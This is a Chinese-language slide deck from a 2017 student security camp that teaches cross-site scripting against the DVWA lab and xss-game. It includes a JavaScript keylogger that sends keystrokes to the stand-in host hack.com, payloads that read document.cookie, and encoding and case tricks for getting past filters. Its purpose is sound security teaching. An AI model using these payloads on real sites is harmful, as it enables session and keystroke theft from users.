Web Security

Cross-site scripting - XSS

XSS 攻擊技術 - 從入門到崩潰

課程學習準備

  • 安裝最新版 Firefox

  • 安裝插件 Tamper data

  • 安裝插件 hack bar​ 

課程練習準備

  • 安裝 DVWA-1.9

  • 安裝 xmapp-5.5.38-VC11

  • 安裝 Kali Linux-2016.2

XAMPP  Install

DVWA  Install

admin / password

Cross-site scripting (CSS)

這縮寫好像...

Cascading Style Sheets (CSS)

因此取了諧音改叫

XSS

XSS 的特色?

  • 耗時間

  • 有相當機率不成功

  • 幾乎沒有自動攻擊套件/工具

  • 需要會基本 html、JS

  • 後期需要很扎實的  html、JS

  • 相當被動型的攻擊手法

  • 遇到 Httponly、crossdomian.xml就掛掉

  • 各大網站都有機會出現

XSS 精華在於

執行你自己精美的 "JS"

正常來說我們是這樣用

如果裡面改成你自己的 JS 呢?

var keys='';
document.onkeypress = function(e) {
  get = window.event?event:e;
  key = get.keyCode?get.keyCode:get.charCode;
  key = String.fromCharCode(key);
  keys+=key;
}
window.setInterval(function(){
  new Image().src = 'http://hack.com/keylogger.php?c='+keys;
  keys = '';
}, 1000);

Simple keylogger

斯斯有三種,XSS 也有三種

  • XSS Reflected - 反射型 XSS

  • XSS Stored -儲存/持久型 XSS

  • XSS DOM - DOM型 XSS

XSS Reflected - 反射型 XSS

XSS Reflected - 反射型 XSS

Low Security Level


<script>alert("XSS Reflected")</script>

<script>alert(document.cookie);</script>
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?> 

XSS Reflected - 反射型 XSS

Medium Security Level


<SCRipt>alert(document.cookie);</ScripT>

<scri<script>pt>alert(document.cookie);</scr<script>ipt>
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?> 

XSS Reflected - 反射型 XSS

High Security Level


<img src=1 onerror=alert('XSS Reflected')>
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?> 

XSS Reflected - 反射型 XSS

Impossible Security Level

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?> 

祕訣?

  • 見框就插

  • 改封包不可見的部分(隱藏欄位)

  • 改URL參數

  • js分析

  • 大小寫/編碼混淆

  • 嵌入構造

XSS Stored - ​儲存/持久型 XSS

  • 儲存型 > 保留在 Server 端

  • 反射型 > 執行在 Client 端


<img src=1 onerror=alert('XSSStored')>

<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>

XSS DOM - DOM型 XSS

特色

  • 與 Server 端無關

  • 基於 Javascript 利用上

  • 比較 難挖掘

  • 如果遇到 自定義函數 會很靠腰

  • 相當少見

XSS 攻擊的精華只有一句話 :

“XSS 就是在頁面

執行你想要的 JS“

Little tips

XSS-HTML 編碼

HTML Parser

JS Parser

CSS Parser

Browser 解析順序

HTML DEcoding

JS

DEcoding

CSS DEcoding

Browser 解碼順序

這順序有什麼關係呢?

\舉個例子/

當你的 xss 插入點在 <script> 中時
在純 HTML (非 XHTML 時)
怎樣都不可能被執行

\舉個例子/

當你手動嘗試編碼繞過 filter 時
感覺解碼起來是對的

可是就是跑不動

So...Why?

1 + 1 * 3 = 4

1 + 1 * 3 = 6

語言結構的解析差異

1 + 1 * 3 = 4

1 + 1 * 3 = 6

1(int)  +(option) 1(int)  *(option) 3(int)
<img src = 1/>

      (Data State)

<    (Tag open state)
img  (Tag name state)

src

=

1

/

>    (Tag close state)
      (Data State)
  • HTML編碼 只有在 Data State(標籤外部 or 標籤內的 text ) 和屬性值下才會解碼

  • 遇到特殊模式時,Data State 下也不會進行解碼

  • Tag name/open/close state 三種狀態下也不會進行 HTML 解碼

 特殊模式

  • <style>

  • <script>

  • <textarea>

  • <xmp>

以下 Tag 內的 text

就算是 Data state 也不進行 HTML 解析

  • <img src='x' onerror=alert("HrJ超帥 der")>

  • <img src='x' onerror='alert("HrJ超帥 der")'>

  • <img src='x' onerror=
    &#97;&#108;&#101;&#114;&#116;&#40;&#34;&#72;&#114;&#74;&#36229;&#24101;&#32;&#100;&#101;&#114;&#34;&#41;>

  • <img src='x' one&#114;&#114;&#111;&#114;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#72;&#114;&#74;&#36229;&#24101;&#32;&#100;&#101;&#114;&#34;&#41;>

<script>…${XSS payload}…</script> 
直接插入到SCRIPT中

<!– ${XSS payload} –> 
插入到HTML註解中

<div ${XSS payload}=”…”></div>
插入到HTML屬性標籤中

<div name=”…${XSS payload}…”></div>
插入到HTML標籤的屬性值中

<${XSS payload} href=”…”></a>
偽裝HTML標籤名稱

<style>…${XSS payload}…</style>
直接插入到CSS里

<img src=1 onerror=alert('xss')>
當找不到圖片名稱為 1 時,執行 error

<a href=javascrip:alert('xss')>s</a> 
點擊時運行

<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>
利用iframe的scr來跳窗

<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
避開 alert 來跳窗

Playing~

Lession 1

<script>alert("HrJ超帥 der")</script>

Lession 2

<img src='x' onerror='alert("HrJ超帥 der")'>
<img src='x' onerror='alert(document.cookie)'>
<img src="${任意圖片網址}" onclick='alert("HrJ超帥 der")' />
<img src="${任意圖片網址}" onmousemove='alert("HrJ超帥 der")' />

Lession 3

' onerror='alert("HrJ超帥der")'>

Lession 4

');alert('HrJ超帥der

Lession 5

javascript: alert("HrJ超帥der");

Lession 6

https://xss-game.appspot.com/level6/frame#[url]

[url] = //www.google.com/jsapi?callback=alert


data:text/plain,alert('xss')

更多練習~

Q & A

建景楓成四校社團聯合資訊營 - Web Security Cross-site scripting - XSS - 20170124

By hrjk

建景楓成四校社團聯合資訊營 - Web Security Cross-site scripting - XSS - 20170124

  • 2,327